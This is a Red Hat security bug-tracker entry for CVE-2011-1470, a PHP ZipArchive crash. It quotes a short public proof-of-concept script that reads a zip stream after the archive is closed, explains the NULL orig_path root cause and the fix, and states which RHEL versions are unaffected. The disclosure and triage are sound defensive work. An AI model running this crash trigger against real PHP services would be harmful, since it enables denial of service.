Bug 690911 (CVE-2011-1470)
Summary: | CVE-2011-1470 php: crash when processing certain Zip archives | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED NOTABUG | QA Contact: | |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | unspecified | CC: | bressers, dkutalek, fedora, jorton, rpm |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2011-10-12 11:42:06 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | |||
Bug Blocks: | 715030 |
Description
Jan Lieskovsky
2011-03-25 18:54:57 UTC
Public PoC from [2]: ==================== <?php $target_file = 'META-INF/MANIFEST.MF'; $za = new ZipArchive(); if ($za->open('test.jar') !== TRUE) { return FALSE; } if ($za->statName($target_file) !== FALSE) { $fd = $za->getStream($target_file); } else { $fd = FALSE; } $za->close(); if (is_resource($fd)) { echo strlen(stream_get_contents($fd)); } ?> Details from Joseph Orton: ========================= The fix for this one: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/zip_stream.c?r1=306493&r2=306492&pathrev=306493 ensures stream->orig_path is non-NULL in the zip stream object. This matters because php_zip_ops_stat assumes ->orig_path is non-NULL: static int php_zip_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */ { struct zip_stat sb; const char *path = stream->orig_path; int path_len = strlen(stream->orig_path); But php_zip_ops_stat() was only added in PHP 5.3.4; the function does not exist in 5.3.3, nor does anything else in ext/zip which assumes stream->orig_path is non-NULL. Conclusion: CVE-2011-1470 only affects PHP 5.3.4 and 5.3.5. Statement: This issue does not affect the version of php shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue does not affect the version of php53 shipped with Red Hat Enterprise Linux 5. |